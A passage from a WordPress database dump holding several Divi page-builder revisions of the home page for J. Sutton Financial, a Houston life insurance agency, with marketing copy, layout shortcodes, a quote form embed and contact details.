column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:03:21','2023-04-08 21:03:21','',138,'http://cmdev-site1.com/?p=852',0,'revision','',0),(854,1,'2023-04-08 21:08:29','2023-04-08 21:08:29','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_button button_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/products-services/\"][/et_pb_button][et_pb_button button_text=\"Work for Us\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_bg_enable_color=\"on\" button_border_width=\"0px\" button_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_url=\"/careers/\"][/et_pb_button][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:08:29','2023-04-08 21:08:29','',138,'http://cmdev-site1.com/?p=854',0,'revision','',0),(853,1,'2023-04-08 21:04:36','2023-04-08 21:04:36','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"right\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"left\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" 